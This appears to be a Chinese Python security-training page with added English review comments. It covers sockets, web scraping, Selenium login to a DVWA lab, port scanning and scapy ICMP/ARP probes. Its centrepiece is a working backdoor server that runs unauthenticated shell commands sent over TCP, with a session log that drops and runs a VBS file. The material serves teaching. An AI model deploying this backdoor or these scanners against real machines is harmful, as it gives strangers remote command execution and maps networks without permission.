import socket
# 定义一个客户端连接
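def test_client():
    """Open a TCP connection to a local server and send one greeting.

    The payload is GBK-encoded. For this ASCII-only text the bytes match
    UTF-8, but the receiver must use the same codec once non-ASCII text is
    sent.
    """
    # NOTE(review): this connects to port 554, while test_server on this page
    # binds port 555 -- confirm which port is intended.
    # socket.socket() with no arguments creates an IPv4 TCP socket. The
    # context manager closes it even when connect() or sendall() raises.
    with socket.socket() as s:
        s.connect(('127.0.0.1', 554))  # server IP address and port
        content = "Welcome to Woniu College"
        # sendall() retries until the whole buffer is written; send() may
        # transmit only part of it and return early.
        s.sendall(content.encode('gbk'))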
test_client()
# 定义一个服务器端
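def test_server():
    """Accept TCP connections on 127.0.0.1:555 and print what each client sends.

    Loops forever; every accepted connection is read once (up to 1024 bytes)
    and then closed.
    """
    with socket.socket() as s:
        # Binding opens the port as soon as the server starts. 127.0.0.1
        # keeps the listener reachable from this machine only.
        s.bind(('127.0.0.1', 555))
        s.listen()
        while True:
            chanel, client = s.accept()
            # Close each accepted connection; otherwise every client leaves
            # an open file descriptor behind for the life of the process.
            with chanel:
                message = chanel.recv(1024)  # read at most 1024 bytes
                # The peer controls these bytes (test_client on this page
                # sends GBK), so undecodable input is replaced instead of
                # raising UnicodeDecodeError and stopping the server.
                print(message.decode(errors='replace'))
                print(client)  # e.g. ('127.0.0.1', 6271)
                print(chanel)  # socket object with laddr/raddr of the connection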
test_server()
import socket
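def normal_talk():
    """Serve one client on TCP port 6666 with a simple text-replacement reply.

    Each received message is printed and echoed back with "吗?" replaced by
    "!". The function returns when the client closes the connection.
    """
    with socket.socket() as s:
        # 0.0.0.0 exposes the port on every interface, so any host that can
        # route to this machine can connect. Binding 127.0.0.1 instead would
        # restrict access to local processes.
        s.bind(('0.0.0.0', 6666))
        s.listen()
        # accept() is called once, so only a single client is ever served.
        # Calling it inside the loop would block before every message.
        chanel, client = s.accept()
        with chanel:
            while True:
                data = chanel.recv(1024)
                if not data:
                    # recv() returns b"" once the peer has closed; without
                    # this check the loop spins forever on empty messages.
                    break
                # Peer-controlled bytes: replace undecodable sequences
                # rather than crash on invalid UTF-8.
                receive = data.decode(errors='replace')
                print(f"收到消息:{receive}")
                reply = receive.replace("吗?", "!")
                chanel.sendall(reply.encode())  # server -> client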
# 核心思路:客户端发送一条特殊字符串,里面包含要执行的命令,让服务器端执行命令并返回结果给客户端
import os
def attack_talk():
    """Chat server that also runs commands sent by the connected peer.

    Demonstrates a command-execution backdoor: a message that begins with
    the marker ``==##==`` has the text after its last comma passed to
    ``os.popen`` and the output sent back. Nothing authenticates the peer
    and the socket is bound to every interface, so any host that can reach
    TCP port 6666 can run shell commands with this process's privileges.

    Defender view: the observable artifacts are a Python process listening
    on 0.0.0.0:6666, shell child processes spawned by that interpreter, and
    the cleartext ``==##==`` marker in the TCP stream.
    """
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 6666))  # all interfaces, not just loopback
        s.listen()
        chanel, client = s.accept()  # a single peer is served per run
        while True:
            receive = chanel.recv(1024).decode()
            # Trigger format: ==##==,command
            if receive.startswith('==##=='):
                # Only the text after the last comma is kept as the command.
                command = receive.split(',')[-1]
                # os.popen hands the string to the system shell unfiltered.
                reply = os.popen(command).read()
                chanel.send(f"命令{command}的运行结果:\n{reply}".encode())
            else:
                print(f"收到消息:{receive}")
                reply = receive.replace("吗?", "!")
                chanel.send(reply.encode())
    # Bare except also traps KeyboardInterrupt/SystemExit. If socket.socket()
    # itself failed, `s` is unbound here and s.close() raises NameError.
    except:
        s.close()
        # NOTE(review): indentation was lost on this page; this restart call
        # is assumed to sit inside the handler -- confirm. Restarting by
        # recursion adds a stack frame on every failure.
        attack_talk()
attack_talk()
import socket
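# Interactive client for the chat servers above: read a line, send it, print
# the reply. The context manager closes the socket on any exit path.
with socket.socket() as s:
    s.connect(('127.0.0.1', 6666))
    # To reach a server on another machine, use its LAN address instead,
    # e.g. ('192.168.0.106', 6666).
    while True:
        message = input("请输入消息:")
        if not message:
            # An empty line sends zero bytes, so the server never answers
            # and recv() below would block forever.
            continue
        s.sendall(message.encode())
        receive = s.recv(10240)
        if not receive:
            # b"" means the server closed the connection.
            break
        # The reply is remote-controlled text: decode leniently and treat it
        # as data to display, nothing more.
        reply_text = receive.decode(errors='replace')
        print(f"服务器回复:{reply_text}")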
请输入消息:==##==,echo msgbox("你中招了") > d:\t.vbs
服务器回复:命令echo msgbox("你中招了") > d:\t.vbs的运行结果:
请输入消息:==##==,d:\t.vbs
服务器回复:命令d:\t.vbs的运行结果:
爬虫
DOM:
需要安装lxml
from bs4 import BeautifulSoup
import requests
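# requests has no default timeout; without one a stalled server hangs the
# script indefinitely. raise_for_status() stops on HTTP errors instead of
# parsing an error page as if it were the target document.
resp = requests.get('http://www.woniunote.com/', timeout=10)
resp.raise_for_status()
# Build the parser (the 'lxml' backend must be installed). The page is
# fetched over plain HTTP, so treat everything in it as untrusted input.
html = BeautifulSoup(resp.text, 'lxml')
# Navigate by tag hierarchy.
print(html.head.title)         # the <title> element
print(html.head.title.string)  # the title's text content
print(html.div)                # first <div> in the document
print(html.div.div.div)        # first <div> nested three levels deep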
查找页面元素的通用方法:
1、find_all:根据标签,属性,XPath等进行查找
from bs4 import BeautifulSoup
import requests
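# requests has no default timeout; without one a stalled server hangs the
# script indefinitely. raise_for_status() stops on HTTP errors instead of
# parsing an error page as if it were the target document.
resp = requests.get('http://www.woniunote.com/', timeout=10)
resp.raise_for_status()
# Build the parser (the 'lxml' backend must be installed).
html = BeautifulSoup(resp.text, 'lxml')

# Every hyperlink on the page.
links = html.find_all('a')
for link in links:
    # print(link) would show e.g. <a class="navbar-brand" href="#">快捷导航</a>
    # .get() returns None for anchors without an href; link['href'] would
    # raise KeyError and abort the loop on the first such tag.
    print(link.get('href'))

# Look up by attribute (id, class, ...). find() returns None when nothing
# matches, so guard before reading attributes of the result.
keyword = html.find(id='keyword')  # the <input id="keyword" ...> search box
print(keyword)
if keyword is not None:
    print(keyword.get('placeholder'))  # value of the placeholder attribute

titles = html.find_all(class_='title')  # tags with class="title"
for title in titles:
    print(title)
    print(title.string)
    anchor = title.find('a')  # the <a> inside this title, if any
    print(anchor)
    if anchor is not None:
        print(anchor.string)

# Search by text content. `string=` is the current name of the argument that
# older BeautifulSoup releases called `text=`.
title = html.find(string='揭秘:带你了解学员眼中真实的阿多比!')
if title is not None:
    print(title.parent)         # the enclosing <a href="/article/605">
    print(title.parent.parent)  # the enclosing <div class="title">

# XPath-like lookup, equivalent to //div[@class='title'].
titles = html.find_all('div', {'class': 'title'})
for title in titles:
    print(title.string)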
2、select:CSS选择器,div, #id, .class
from bs4 import BeautifulSoup
import requests
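# requests has no default timeout; without one a stalled server hangs the
# script indefinitely. raise_for_status() stops on HTTP errors instead of
# parsing an error page as if it were the target document.
resp = requests.get('http://www.woniunote.com/', timeout=10)
resp.raise_for_status()
# Build the parser (the 'lxml' backend must be installed).
html = BeautifulSoup(resp.text, 'lxml')

# CSS selectors: tag, #id, .class. 'div.title' would restrict the match to
# <div> elements; '.title' matches any tag with that class.
titles = html.select('.title')
for title in titles:
    print(title.string)

# select() always returns a list; it is empty when nothing matches, so check
# before indexing to avoid an IndexError if the page layout changes.
keyword = html.select('#keyword')
if keyword:
    print(keyword[0]['placeholder'])

lis = html.select('ul li')  # every <li> that is a descendant of a <ul>
print(lis)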
基于selenium操作web页面
Chrome驱动器,要对应好版本,相差不大就行。
将下载解压后的exe文件设置环境变量,由于已经将python设置了环境变量,所以可以直接将exe文件放到python目录中
还要设置浏览器的环境变量。
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
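# Step 1: create the WebDriver object that starts and controls the browser.
# chromedriver is looked up on PATH by default. On Selenium 4 an explicit
# driver path is passed through a Service object rather than executable_path.
driver = webdriver.Chrome()
try:
    driver.get('http://dvwa/login.php')
    time.sleep(1)  # crude wait for the page to load
    print(driver.title)        # page title
    print(driver.page_source)  # page HTML source

    # Fill in the login form and submit it.
    # Lab credentials are hard-coded here and travel over plain HTTP;
    # anything non-throwaway belongs in an environment variable or secret
    # store, not in source.
    driver.find_element(by=By.NAME, value='username').send_keys("admin")
    driver.find_element(by=By.NAME, value="password").send_keys("22222")
    driver.find_element(by=By.NAME, value="Login").click()
finally:
    # Without quit() the browser and its chromedriver process stay running
    # after the script ends, including when a step above raises.
    driver.quit()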
处理SMTP发送邮箱
扫描ip端口
import socket
# 对目标IP进行端口扫描,尝试连接目标IP和端口,如果连接成功,说明端口开放,否则未开放。
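def socket_port(ip):
    """Print every TCP port on *ip* (1-65535) that accepts a connection.

    Each probe is a complete TCP handshake, so it shows up in the target's
    connection logs and to network monitoring. Ports are tried one at a
    time with a 0.5 s timeout each.
    """
    for port in range(1, 65536):
        try:
            # The context manager closes the socket on failure as well; the
            # original closed it only after a successful connect, leaking
            # one descriptor per closed or filtered port.
            with socket.socket() as s:
                s.settimeout(0.5)  # bound the wait on filtered ports
                s.connect((ip, port))
                print(f"端口:{port} 可用.")
        except OSError:
            # Covers refused connections and timeouts, plus errors such as
            # "no route to host" that would otherwise abort the whole scan.
            continue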
# 基于多线程进行端口扫描
import socket,threading
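def socket_port_thread(ip, start):
    """Print the open TCP ports on *ip* among the 50 ports beginning at *start*.

    Meant to run as a thread target, one call per 50-port slice. Each probe
    is a complete TCP handshake with a 0.5 s timeout.
    """
    for port in range(start, start + 50):
        try:
            # Close the socket on every path; the original leaked it
            # whenever connect() failed.
            with socket.socket() as s:
                s.settimeout(0.5)  # bound the wait on filtered ports
                s.connect((ip, port))
                print(f"端口:{port} 可用.")
        except OSError:
            # Refused, timed out or unreachable: treat as closed. A bare
            # `except:` would also swallow KeyboardInterrupt and hide
            # programming errors.
            continue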
if __name__ == '__main__':
    # Ports 1-5000 are split into 100 slices of 50 and each slice gets its
    # own thread. The threads are started but never joined.
    target_host = '192.168.0.107'
    for first_port in range(1, 5000, 50):
        worker = threading.Thread(
            target=socket_port_thread,
            args=(target_host, first_port),
        )
        worker.start()
scapy
发送ICMP报文
>>> send(IP(dst="192.168.0.107")/ICMP())
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.
发送ICMP报文,并带有内容
>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.
发送指定间隔和次数的ICMP
>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp",inter=1,count=5)
.....
Sent 5 packets.
>>> pkg=sr1(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<IP version=4 ihl=5 tos=0x0 len=47 id=5061 flags= frag=0 ttl=128 proto=icmp chksum=0xa4e3 src=192.168.0.107 dst=192.168.0.106 |<ICMP type=echo-reply code=0 chksum=0x9c0b id=0x0 seq=0x0 unused='' |<Raw load='ppppppppppppppppppp' |>>>
>>> pkg[Raw].load
b'ppppppppppppppppppp'
>>>
构造ARP 请求
通过ARP原理来扫描网络中的IP:ARP工作在数据链路层,主机防火墙通常不会拦截ARP请求;但ARP只在同一广播域(本地网段)内有效,无法跨路由器探测。
>>> pkg=sr1(ARP(psrc="192.168.0.106",pdst="192.168.0.107"))
Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<ARP hwtype=0x1 ptype=IPv4 hwlen=6 plen=4 op=is-at hwsrc=00:0c:29:50:2e:93 psrc=192.168.0.107 hwdst=e0:d4:e8:c6:41:9d pdst=192.168.0.106 |>
>>>